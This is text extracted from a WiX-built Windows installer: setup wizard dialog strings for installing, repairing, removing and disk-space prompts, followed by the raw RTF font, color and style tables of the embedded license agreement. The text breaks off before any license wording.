&Retry to continue setup or Exit to exit it.Some files that need to be updated are currently in use.{\\WixUI\_Font\_Title}Files in UseListFileInUseProcessMsiRMFilesInUseShutdownOptionRadioButtonGroupWixUIRMOptionThe following applications are using files that need to be updated by this setup. You can let Setup Wizard close them and attempt to restart them or reboot the machine later.PrepareDlgPlease wait while the Setup Wizard prepares to guide you through the installation.{\\WixUI\_Font\_Bigger}Welcome to the \[ProductName\] Setup WizardNext&NextActionDataActionTextCancelDlgNoYesAre you sure you want to cancel \[ProductName\] installation?ProgressDlgTextInstallingPlease wait while the Setup Wizard installs \[ProductName\].TitleInstalling{\\WixUI\_Font\_Title}Installing \[ProductName\]TextChangingPlease wait while the Setup Wizard changes \[ProductName\].TitleChanging{\\WixUI\_Font\_Title}Changing \[ProductName\]TextRepairingPlease wait while the Setup Wizard repairs \[ProductName\].TitleRepairing{\\WixUI\_Font\_Title}Repairing \[ProductName\]TextRemovingPlease wait while the Setup Wizard removes \[ProductName\].TitleRemoving{\\WixUI\_Font\_Title}Removing \[ProductName\]TextUpdatingPlease wait while the Setup Wizard updates \[ProductName\].TitleUpdating{\\WixUI\_Font\_Title}Updating \[ProductName\]ProgressBarProgress doneStatusLabelStatus:ResumeDlgInstall&InstallInstallNoShieldThe Setup Wizard will complete the installation of \[ProductName\] on your computer. Click Install to continue or Cancel to exit the Setup Wizard.{\\WixUI\_Font\_Bigger}Resuming the \[ProductName\] Setup WizardWaitForCostingDlgReturn&ReturnPlease wait while the installer finishes determining your disk space requirements.Exclamation icon|OutOfRbDiskDlgThe highlighted volumes do not have enough disk space available for the currently selected features. You can remove some files from the highlighted volumes, install fewer features, or select a different destination drive. Alternatively, you may choose to disable the installer's rollback functionality. Disabling rollback prevents the installer from restoring your computer's original state should the installation be interrupted in any way. Click Yes if you wish to take the risk of disabling rollback.Disk space required for the installation exceeds available disk space.{\\WixUI\_Font\_Title}Out of Disk SpaceOutOfDiskDlgThe highlighted volumes do not have enough disk space available for the currently selected features. You can remove some files from the highlighted volumes, install fewer features, or select a different destination drive.{\\WixUI\_Font\_Bigger}\[ProductName\] Setup Wizard was interrupted\[ProductName\] setup was interrupted. Your system has not been modified. To install this program at a later time, please run the installation again. Click the Finish button to exit the Setup Wizard.InvalidDirDlgInstallation directory must be on a local hard drive.OptionalCheckBoxClick the Finish button to exit the Setup Wizard.{\\WixUI\_Font\_Bigger}Completed the \[ProductName\] Setup WizardOptionalText\[WIXUI\_EXITDIALOGOPTIONALTEXT\]\[WIXUI\_EXITDIALOGOPTIONALCHECKBOXTEXT\]WelcomeDlgThe Setup Wizard will install \[ProductName\] on your computer. Click Next to continue or Cancel to exit the Setup Wizard.PatchDescriptionThe Setup Wizard will update \[ProductName\] on your computer. Click Next to continue or Cancel to exit the Setup Wizard.LicenseAgreementDlgLicenseAcceptedCheckBoxPlease read the following license agreement carefully{\\WixUI\_Font\_Title}End-User License AgreementI &accept the terms in the License AgreementPrint&PrintLicenseTextScrollableText{\\rtf1\\adeflang1025\\ansi\\ansicpg1252\\uc1\\adeff39\\deff0\\stshfdbch0\\stshfloch31506\\stshfhich31506\\stshfbi31506\\deflang1033\\deflangfe1033\\themelang1033\\themelangfe0\\themelangcs0{\\fonttbl{\\f0\\fbidi \\froman\\fcharset0\\fprq2{\\\*\\panose 02020603050405020304}Times New Roman;}{\\f2\\fbidi \\fmodern\\fcharset0\\fprq1{\\\*\\panose 02070309020205020404}Courier New;} {\\f3\\fbidi \\froman\\fcharset2\\fprq2{\\\*\\panose 05050102010706020507}Symbol;}{\\f10\\fbidi \\fnil\\fcharset2\\fprq2{\\\*\\panose 05000000000000000000}Wingdings;} {\\f11\\fbidi \\fmodern\\fcharset128\\fprq1{\\\*\\panose 02020609040205080304}MS Mincho{\\\*\\falt ?l?r ??\\'81\\'66c};}{\\f13\\fbidi \\fnil\\fcharset134\\fprq2{\\\*\\panose 02010600030101010101}SimSun{\\\*\\falt ??\\'a1\\'a7??};} {\\f13\\fbidi \\fnil\\fcharset134\\fprq2{\\\*\\panose 02010600030101010101}SimSun{\\\*\\falt ??\\'a1\\'a7??};}{\\f39\\fbidi \\fswiss\\fcharset0\\fprq2{\\\*\\panose 020b0604030504040204}Tahoma;} {\\f40\\fbidi \\fswiss\\fcharset0\\fprq2{\\\*\\panose 020b0603020202020204}Trebuchet MS{\\\*\\falt Arial};}{\\f42\\fbidi \\fmodern\\fcharset128\\fprq1{\\\*\\panose 02020609040205080304}@MS Mincho;}{\\f43\\fbidi \\fnil\\fcharset134\\fprq2{\\\*\\panose 02010600030101010101}@SimSun;} {\\flomajor\\f31500\\fbidi \\froman\\fcharset0\\fprq2{\\\*\\panose 02020603050405020304}Times New Roman;}{\\fdbmajor\\f31501\\fbidi \\froman\\fcharset0\\fprq2{\\\*\\panose 02020603050405020304}Times New Roman;} {\\fhimajor\\f31502\\fbidi \\fswiss\\fcharset0\\fprq2{\\\*\\panose 020f0302020204030204}Calibri Light;}{\\fbimajor\\f31503\\fbidi \\froman\\fcharset0\\fprq2{\\\*\\panose 02020603050405020304}Times New Roman;} {\\flominor\\f31504\\fbidi \\froman\\fcharset0\\fprq2{\\\*\\panose 02020603050405020304}Times New Roman;}{\\fdbminor\\f31505\\fbidi \\froman\\fcharset0\\fprq2{\\\*\\panose 02020603050405020304}Times New Roman;} {\\fhiminor\\f31506\\fbidi \\fswiss\\fcharset0\\fprq2{\\\*\\panose 020f0502020204030204}Calibri;}{\\fbiminor\\f31507\\fbidi \\froman\\fcharset0\\fprq2{\\\*\\panose 02020603050405020304}Times New Roman;}{\\f450\\fbidi \\froman\\fcharset238\\fprq2 Times New Roman CE;} {\\f451\\fbidi \\froman\\fcharset204\\fprq2 Times New Roman Cyr;}{\\f453\\fbidi \\froman\\fcharset161\\fprq2 Times New Roman Greek;}{\\f454\\fbidi \\froman\\fcharset162\\fprq2 Times New Roman Tur;}{\\f455\\fbidi \\froman\\fcharset177\\fprq2 Times New Roman (Hebrew);} {\\f456\\fbidi \\froman\\fcharset178\\fprq2 Times New Roman (Arabic);}{\\f457\\fbidi \\froman\\fcharset186\\fprq2 Times New Roman Baltic;}{\\f458\\fbidi \\froman\\fcharset163\\fprq2 Times New Roman (Vietnamese);}{\\f470\\fbidi \\fmodern\\fcharset238\\fprq1 Courier New CE;} {\\f471\\fbidi \\fmodern\\fcharset204\\fprq1 Courier New Cyr;}{\\f473\\fbidi \\fmodern\\fcharset161\\fprq1 Courier New Greek;}{\\f474\\fbidi \\fmodern\\fcharset162\\fprq1 Courier New Tur;}{\\f475\\fbidi \\fmodern\\fcharset177\\fprq1 Courier New (Hebrew);} {\\f476\\fbidi \\fmodern\\fcharset178\\fprq1 Courier New (Arabic);}{\\f477\\fbidi \\fmodern\\fcharset186\\fprq1 Courier New Baltic;}{\\f478\\fbidi \\fmodern\\fcharset163\\fprq1 Courier New (Vietnamese);} {\\f562\\fbidi \\fmodern\\fcharset0\\fprq1 MS Mincho Western{\\\*\\falt ?l?r ??\\'81\\'66c};}{\\f560\\fbidi \\fmodern\\fcharset238\\fprq1 MS Mincho CE{\\\*\\falt ?l?r ??\\'81\\'66c};}{\\f561\\fbidi \\fmodern\\fcharset204\\fprq1 MS Mincho Cyr{\\\*\\falt ?l?r ??\\'81\\'66c};} {\\f563\\fbidi \\fmodern\\fcharset161\\fprq1 MS Mincho Greek{\\\*\\falt ?l?r ??\\'81\\'66c};}{\\f564\\fbidi \\fmodern\\fcharset162\\fprq1 MS Mincho Tur{\\\*\\falt ?l?r ??\\'81\\'66c};}{\\f567\\fbidi \\fmodern\\fcharset186\\fprq1 MS Mincho Baltic{\\\*\\falt ?l?r ??\\'81\\'66c};} {\\f582\\fbidi \\fnil\\fcharset0\\fprq2 SimSun Western{\\\*\\falt ??\\'a1\\'a7??};}{\\f582\\fbidi \\fnil\\fcharset0\\fprq2 SimSun Western{\\\*\\falt ??\\'a1\\'a7??};}{\\f840\\fbidi \\fswiss\\fcharset238\\fprq2 Tahoma CE;}{\\f841\\fbidi \\fswiss\\fcharset204\\fprq2 Tahoma Cyr;} {\\f843\\fbidi \\fswiss\\fcharset161\\fprq2 Tahoma Greek;}{\\f844\\fbidi \\fswiss\\fcharset162\\fprq2 Tahoma Tur;}{\\f845\\fbidi \\fswiss\\fcharset177\\fprq2 Tahoma (Hebrew);}{\\f846\\fbidi \\fswiss\\fcharset178\\fprq2 Tahoma (Arabic);} {\\f847\\fbidi \\fswiss\\fcharset186\\fprq2 Tahoma Baltic;}{\\f848\\fbidi \\fswiss\\fcharset163\\fprq2 Tahoma (Vietnamese);}{\\f849\\fbidi \\fswiss\\fcharset222\\fprq2 Tahoma (Thai);}{\\f850\\fbidi \\fswiss\\fcharset238\\fprq2 Trebuchet MS CE{\\\*\\falt Arial};} {\\f851\\fbidi \\fswiss\\fcharset204\\fprq2 Trebuchet MS Cyr{\\\*\\falt Arial};}{\\f853\\fbidi \\fswiss\\fcharset161\\fprq2 Trebuchet MS Greek{\\\*\\falt Arial};}{\\f854\\fbidi \\fswiss\\fcharset162\\fprq2 Trebuchet MS Tur{\\\*\\falt Arial};} {\\f857\\fbidi \\fswiss\\fcharset186\\fprq2 Trebuchet MS Baltic{\\\*\\falt Arial};}{\\f872\\fbidi \\fmodern\\fcharset0\\fprq1 @MS Mincho Western;}{\\f870\\fbidi \\fmodern\\fcharset238\\fprq1 @MS Mincho CE;}{\\f871\\fbidi \\fmodern\\fcharset204\\fprq1 @MS Mincho Cyr;} {\\f873\\fbidi \\fmodern\\fcharset161\\fprq1 @MS Mincho Greek;}{\\f874\\fbidi \\fmodern\\fcharset162\\fprq1 @MS Mincho Tur;}{\\f877\\fbidi \\fmodern\\fcharset186\\fprq1 @MS Mincho Baltic;}{\\f882\\fbidi \\fnil\\fcharset0\\fprq2 @SimSun Western;} {\\flomajor\\f31508\\fbidi \\froman\\fcharset238\\fprq2 Times New Roman CE;}{\\flomajor\\f31509\\fbidi \\froman\\fcharset204\\fprq2 Times New Roman Cyr;}{\\flomajor\\f31511\\fbidi \\froman\\fcharset161\\fprq2 Times New Roman Greek;} {\\flomajor\\f31512\\fbidi \\froman\\fcharset162\\fprq2 Times New Roman Tur;}{\\flomajor\\f31513\\fbidi \\froman\\fcharset177\\fprq2 Times New Roman (Hebrew);}{\\flomajor\\f31514\\fbidi \\froman\\fcharset178\\fprq2 Times New Roman (Arabic);} {\\flomajor\\f31515\\fbidi \\froman\\fcharset186\\fprq2 Times New Roman Baltic;}{\\flomajor\\f31516\\fbidi \\froman\\fcharset163\\fprq2 Times New Roman (Vietnamese);}{\\fdbmajor\\f31518\\fbidi \\froman\\fcharset238\\fprq2 Times New Roman CE;} {\\fdbmajor\\f31519\\fbidi \\froman\\fcharset204\\fprq2 Times New Roman Cyr;}{\\fdbmajor\\f31521\\fbidi \\froman\\fcharset161\\fprq2 Times New Roman Greek;}{\\fdbmajor\\f31522\\fbidi \\froman\\fcharset162\\fprq2 Times New Roman Tur;} {\\fdbmajor\\f31523\\fbidi \\froman\\fcharset177\\fprq2 Times New Roman (Hebrew);}{\\fdbmajor\\f31524\\fbidi \\froman\\fcharset178\\fprq2 Times New Roman (Arabic);}{\\fdbmajor\\f31525\\fbidi \\froman\\fcharset186\\fprq2 Times New Roman Baltic;} {\\fdbmajor\\f31526\\fbidi \\froman\\fcharset163\\fprq2 Times New Roman (Vietnamese);}{\\fhimajor\\f31528\\fbidi \\fswiss\\fcharset238\\fprq2 Calibri Light CE;}{\\fhimajor\\f31529\\fbidi \\fswiss\\fcharset204\\fprq2 Calibri Light Cyr;} {\\fhimajor\\f31531\\fbidi \\fswiss\\fcharset161\\fprq2 Calibri Light Greek;}{\\fhimajor\\f31532\\fbidi \\fswiss\\fcharset162\\fprq2 Calibri Light Tur;}{\\fhimajor\\f31535\\fbidi \\fswiss\\fcharset186\\fprq2 Calibri Light Baltic;} {\\fhimajor\\f31536\\fbidi \\fswiss\\fcharset163\\fprq2 Calibri Light (Vietnamese);}{\\fbimajor\\f31538\\fbidi \\froman\\fcharset238\\fprq2 Times New Roman CE;}{\\fbimajor\\f31539\\fbidi \\froman\\fcharset204\\fprq2 Times New Roman Cyr;} {\\fbimajor\\f31541\\fbidi \\froman\\fcharset161\\fprq2 Times New Roman Greek;}{\\fbimajor\\f31542\\fbidi \\froman\\fcharset162\\fprq2 Times New Roman Tur;}{\\fbimajor\\f31543\\fbidi \\froman\\fcharset177\\fprq2 Times New Roman (Hebrew);} {\\fbimajor\\f31544\\fbidi \\froman\\fcharset178\\fprq2 Times New Roman (Arabic);}{\\fbimajor\\f31545\\fbidi \\froman\\fcharset186\\fprq2 Times New Roman Baltic;}{\\fbimajor\\f31546\\fbidi \\froman\\fcharset163\\fprq2 Times New Roman (Vietnamese);} {\\flominor\\f31548\\fbidi \\froman\\fcharset238\\fprq2 Times New Roman CE;}{\\flominor\\f31549\\fbidi \\froman\\fcharset204\\fprq2 Times New Roman Cyr;}{\\flominor\\f31551\\fbidi \\froman\\fcharset161\\fprq2 Times New Roman Greek;} {\\flominor\\f31552\\fbidi \\froman\\fcharset162\\fprq2 Times New Roman Tur;}{\\flominor\\f31553\\fbidi \\froman\\fcharset177\\fprq2 Times New Roman (Hebrew);}{\\flominor\\f31554\\fbidi \\froman\\fcharset178\\fprq2 Times New Roman (Arabic);} {\\flominor\\f31555\\fbidi \\froman\\fcharset186\\fprq2 Times New Roman Baltic;}{\\flominor\\f31556\\fbidi \\froman\\fcharset163\\fprq2 Times New Roman (Vietnamese);}{\\fdbminor\\f31558\\fbidi \\froman\\fcharset238\\fprq2 Times New Roman CE;} {\\fdbminor\\f31559\\fbidi \\froman\\fcharset204\\fprq2 Times New Roman Cyr;}{\\fdbminor\\f31561\\fbidi \\froman\\fcharset161\\fprq2 Times New Roman Greek;}{\\fdbminor\\f31562\\fbidi \\froman\\fcharset162\\fprq2 Times New Roman Tur;} {\\fdbminor\\f31563\\fbidi \\froman\\fcharset177\\fprq2 Times New Roman (Hebrew);}{\\fdbminor\\f31564\\fbidi \\froman\\fcharset178\\fprq2 Times New Roman (Arabic);}{\\fdbminor\\f31565\\fbidi \\froman\\fcharset186\\fprq2 Times New Roman Baltic;} {\\fdbminor\\f31566\\fbidi \\froman\\fcharset163\\fprq2 Times New Roman (Vietnamese);}{\\fhiminor\\f31568\\fbidi \\fswiss\\fcharset238\\fprq2 Calibri CE;}{\\fhiminor\\f31569\\fbidi \\fswiss\\fcharset204\\fprq2 Calibri Cyr;} {\\fhiminor\\f31571\\fbidi \\fswiss\\fcharset161\\fprq2 Calibri Greek;}{\\fhiminor\\f31572\\fbidi \\fswiss\\fcharset162\\fprq2 Calibri Tur;}{\\fhiminor\\f31575\\fbidi \\fswiss\\fcharset186\\fprq2 Calibri Baltic;} {\\fhiminor\\f31576\\fbidi \\fswiss\\fcharset163\\fprq2 Calibri (Vietnamese);}{\\fbiminor\\f31578\\fbidi \\froman\\fcharset238\\fprq2 Times New Roman CE;}{\\fbiminor\\f31579\\fbidi \\froman\\fcharset204\\fprq2 Times New Roman Cyr;} {\\fbiminor\\f31581\\fbidi \\froman\\fcharset161\\fprq2 Times New Roman Greek;}{\\fbiminor\\f31582\\fbidi \\froman\\fcharset162\\fprq2 Times New Roman Tur;}{\\fbiminor\\f31583\\fbidi \\froman\\fcharset177\\fprq2 Times New Roman (Hebrew);} {\\fbiminor\\f31584\\fbidi \\froman\\fcharset178\\fprq2 Times New Roman (Arabic);}{\\fbiminor\\f31585\\fbidi \\froman\\fcharset186\\fprq2 Times New Roman Baltic;}{\\fbiminor\\f31586\\fbidi \\froman\\fcharset163\\fprq2 Times New Roman (Vietnamese);}} {\\colortbl;\\red0\\green0\\blue0;\\red0\\green0\\blue255;\\red0\\green255\\blue255;\\red0\\green255\\blue0;\\red255\\green0\\blue255;\\red255\\green0\\blue0;\\red255\\green255\\blue0;\\red255\\green255\\blue255;\\red0\\green0\\blue128;\\red0\\green128\\blue128;\\red0\\green128\\blue0; \\red128\\green0\\blue128;\\red128\\green0\\blue0;\\red128\\green128\\blue0;\\red128\\green128\\blue128;\\red192\\green192\\blue192;}{\\\*\\defchp \\f31506\\fs22 }{\\\*\\defpap \\ql \\li0\\ri0\\sa160\\sl259\\slmult1 \\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 }\\noqfpromote {\\stylesheet{\\ql \\li0\\ri0\\sb120\\sa120\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\f39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 \\snext0 \\sautoupd \\sqformat \\spriority0 \\styrsid7368928 Normal;}{\\s1\\ql \\fi-357\\li357\\ri0\\sb120\\sa120\\widctlpar \\jclisttab\\tx360\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls2\\outlinelevel0\\adjustright\\rin0\\lin357\\itap0 \\rtlch\\fcs1 \\ab\\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\b\\fs19\\lang1033\\langfe1033\\loch\\f39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 \\sbasedon0 \\snext1 \\slink15 \\sqformat \\styrsid7368928 heading 1;}{\\s2\\ql \\fi-363\\li720\\ri0\\sb120\\sa120\\widctlpar\\jclisttab\\tx720\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls2\\ilvl1\\outlinelevel1\\adjustright\\rin0\\lin720\\itap0 \\rtlch\\fcs1 \\ab\\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\b\\fs19\\lang1033\\langfe1033\\loch\\f39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 \\sbasedon0 \\snext2 \\slink16 \\sqformat \\styrsid7368928 heading 2;}{\\s3\\ql \\fi-357\\li1077\\ri0\\sb120\\sa120\\widctlpar \\tx1077\\jclisttab\\tx1440\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls2\\ilvl2\\outlinelevel2\\adjustright\\rin0\\lin1077\\itap0 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\f39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 \\sbasedon0 \\snext3 \\slink17 \\sqformat \\styrsid7368928 heading 3;}{\\s4\\ql \\fi-358\\li1435\\ri0\\sb120\\sa120\\widctlpar\\jclisttab\\tx1437\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls2\\ilvl3\\outlinelevel3\\adjustright\\rin0\\lin1435\\itap0 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\f39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 \\sbasedon0 \\snext4 \\slink18 \\sqformat \\styrsid7368928 heading 4;}{\\s5\\ql \\fi-357\\li1792\\ri0\\sb120\\sa120\\widctlpar \\tx1792\\jclisttab\\tx2155\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls2\\ilvl4\\outlinelevel4\\adjustright\\rin0\\lin1792\\itap0 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\f39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 \\sbasedon0 \\snext5 \\slink19 \\sqformat \\styrsid7368928 heading 5;}{\\s6\\ql \\fi-357\\li2149\\ri0\\sb120\\sa120\\widctlpar\\jclisttab\\tx2152\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls2\\ilvl5\\outlinelevel5\\adjustright\\rin0\\lin2149\\itap0 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\f39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 \\sbasedon0 \\snext6 \\slink20 \\sqformat \\styrsid7368928 heading 6;}{\\s7\\ql \\fi-357\\li2506\\ri0\\sb120\\sa120\\widctlpar \\jclisttab\\tx2509\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls2\\ilvl6\\outlinelevel6\\adjustright\\rin0\\lin2506\\itap0 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\f39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 \\sbasedon0 \\snext7 \\slink21 \\sqformat \\styrsid7368928 heading 7;}{\\s8\\ql \\fi-357\\li2863\\ri0\\sb120\\sa120\\widctlpar\\jclisttab\\tx2866\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls2\\ilvl7\\outlinelevel7\\adjustright\\rin0\\lin2863\\itap0 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\f39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 \\sbasedon0 \\snext8 \\slink22 \\sqformat \\styrsid7368928 heading 8;}{\\s9\\ql \\fi-358\\li3221\\ri0\\sb120\\sa120\\widctlpar \\jclisttab\\tx3223\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls2\\ilvl8\\outlinelevel8\\adjustright\\rin0\\lin3221\\itap0 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\f39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 \\sbasedon0 \\snext9 \\slink23 \\sqformat \\styrsid7368928 heading 9;}{\\\*\\cs10 \\additive \\ssemihidden \\sunhideused \\spriority1 Default Paragraph Font;}{\\\* \\ts11\\tsrowd\\trftsWidthB3\\trpaddl108\\trpaddr108\\trpaddfl3\\trpaddft3\\trpaddfb3\\trpaddfr3\\trcbpat1\\trcfpat1\\tblind0\\tblindtype3\\tsvertalt\\tsbrdrt\\tsbrdrl\\tsbrdrb\\tsbrdrr\\tsbrdrdgl\\tsbrdrdgr\\tsbrdrh\\tsbrdrv \\ql \\li0\\ri0\\sa160\\sl259\\slmult1 \\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\af31506\\afs22\\alang1025 \\ltrch\\fcs0 \\f31506\\fs22\\lang1033\\langfe1033\\cgrid\\langnp1033\\langfenp1033 \\snext11 \\ssemihidden \\sunhideused Normal Table;}{\\\*\\cs15 \\additive \\rtlch\\fcs1 \\ab\\af39\\afs19 \\ltrch\\fcs0 \\b\\fs19\\loch\\f39\\hich\\af39\\dbch\\af11 \\sbasedon10 \\slink1 \\slocked \\styrsid7368928 Heading 1 Char;}{\\\*\\cs16 \\additive \\rtlch\\fcs1 \\ab\\af39\\afs19 \\ltrch\\fcs0 \\b\\fs19\\loch\\f39\\hich\\af39\\dbch\\af11 \\sbasedon10 \\slink2 \\slocked \\styrsid7368928 Heading 2 Char;}{\\\*\\cs17 \\additive \\rtlch\\fcs1 \\af39\\afs19 \\ltrch\\fcs0 \\fs19\\loch\\f39\\hich\\af39\\dbch\\af11 \\sbasedon10 \\slink3 \\slocked \\styrsid7368928 Heading 3 Char;}{\\\*\\cs18 \\additive \\rtlch\\fcs1 \\af39\\afs19 \\ltrch\\fcs0 \\fs19\\loch\\f39\\hich\\af39\\dbch\\af11 \\sbasedon10 \\slink4 \\slocked \\styrsid7368928 Heading 4 Char;}{\\\*\\cs19 \\additive \\rtlch\\fcs1 \\af39\\afs19 \\ltrch\\fcs0 \\fs19\\loch\\f39\\hich\\af39\\dbch\\af11 \\sbasedon10 \\slink5 \\slocked \\styrsid7368928 Heading 5 Char;}{\\\*\\cs20 \\additive \\rtlch\\fcs1 \\af39\\afs19 \\ltrch\\fcs0 \\fs19\\loch\\f39\\hich\\af39\\dbch\\af11 \\sbasedon10 \\slink6 \\slocked \\styrsid7368928 Heading 6 Char;}{\\\*\\cs21 \\additive \\rtlch\\fcs1 \\af39\\afs19 \\ltrch\\fcs0 \\fs19\\loch\\f39\\hich\\af39\\dbch\\af11 \\sbasedon10 \\slink7 \\slocked \\styrsid7368928 Heading 7 Char;}{\\\*\\cs22 \\additive \\rtlch\\fcs1 \\af39\\afs19 \\ltrch\\fcs0 \\fs19\\loch\\f39\\hich\\af39\\dbch\\af11 \\sbasedon10 \\slink8 \\slocked \\styrsid7368928 Heading 8 Char;}{\\\* \\cs23 \\additive \\rtlch\\fcs1 \\af39\\afs19 \\ltrch\\fcs0 \\fs19\\loch\\f39\\hich\\af39\\dbch\\af11 \\sbasedon10 \\slink9 \\slocked \\styrsid7368928 Heading 9 Char;}{\\s24\\ql \\li357\\ri0\\sb120\\sa120\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin357\\itap0 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\f39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 \\sbasedon0 \\snext24 \\styrsid7368928 Body 1;}{\\s25\\ql \\fi-363\\li720\\ri0\\sb120\\sa120\\widctlpar \\jclisttab\\tx720\\wrapdefault\\aspalpha\\aspnum\\faauto\\ls1\\adjustright\\rin0\\lin720\\itap0 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\f39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 \\sbasedon0 \\snext25 \\styrsid7368928 Bullet 2;}{\\s26\\ql \\li0\\ri0\\sb120\\sa120\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\ab\\af39\\afs28\\alang1025 \\ltrch\\fcs0 \\b\\fs28\\lang1033\\langfe1033\\loch\\f39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 \\sbasedon0 \\snext0 \\styrsid7368928 Heading EULA;}{\\s27\\ql \\li0\\ri0\\sb120\\sa120\\widctlpar\\brdrb\\brdrs\\brdrw10\\brsp20 \\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\ab\\af39\\afs28\\alang1025 \\ltrch\\fcs0 \\b\\fs28\\lang1033\\langfe1033\\loch\\f39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 \\sbasedon0 \\snext0 \\styrsid7368928 Heading Software Title;}{\\s28\\ql \\li0\\ri0\\sb120\\sa120\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\ab\\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\b\\fs19\\lang1033\\langfe1033\\loch\\f39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 \\sbasedon0 \\snext28 \\styrsid7368928 Preamble;}{\\\*\\cs29 \\additive \\rtlch\\fcs1 \\af39 \\ltrch\\fcs0 \\f39\\lang1033\\langfe1033\\langnp1033\\langfenp1033 \\sbasedon10 \\styrsid7368928 Body 2 Char;}{\\\*\\cs30 \\additive \\rtlch\\fcs1 \\af39 \\ltrch\\fcs0 \\f39\\lang1033\\langfe1033\\langnp1033\\langfenp1033 \\sbasedon10 \\styrsid7368928 Body 1 Char;}{ \\s31\\ql \\li0\\ri0\\sb120\\sa120\\widctlpar\\brdrt\\brdrs\\brdrw10\\brsp20 \\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\ab\\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\b\\fs19\\lang1033\\langfe1033\\loch\\f39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 \\sbasedon28 \\snext31 \\styrsid7368928 Preamble Border Above;}{\\\*\\cs32 \\additive \\rtlch\\fcs1 \\af0 \\ltrch\\fcs0 \\ul\\cf2 \\sbasedon10 \\styrsid7368928 Hyperlink,Char Char7;}{ \\s33\\ql \\li0\\ri0\\widctlpar\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\ab\\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\b\\fs19\\lang1033\\langfe1033\\loch\\f39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 \\snext0 \\slink36 \\styrsid7368928 Body 0 Bold;}{\\s34\\ql \\li0\\ri0\\sb120\\sa120\\widctlpar\\tqc\\tx4320\\tqr\\tx8640\\wrapdefault\\aspalpha\\aspnum\\faauto\\adjustright\\rin0\\lin0\\itap0 \\rtlch\\fcs1 \\af39\\afs19\\alang1025 \\ltrch\\fcs0 \\fs19\\lang1033\\langfe1033\\loch\\f39\\hich\\af39\\dbch\\af11\\cgrid\\langnp1033\\langfenp1033 \\sbasedon0 \\snext34 \\slink35 \\styrsid7368928 header;}{\\\*\\cs35 \\additive \\rtlch\\fcs1 \\af39\\afs19 \\ltrch\\fcs0 \\fs19\\loch\\f39\\hich\\af39\\dbch\\af11 \\sbasedon10 \\slink34 \\slocked \\styrsid7368928 Header Char;}{\\\*\\cs36 \\additive \\rtlch\\fcs1 \\ab\\af39\\afs19 \\ltrch\\fcs0 \\b\\fs19\\loch\\f39\\hich\\af39\\dbch\\af11 \\sbasedon10 \\slink33 \\slocked \\styrsid7368928 Body 0 Bold Char;}{ \\s37\\ql 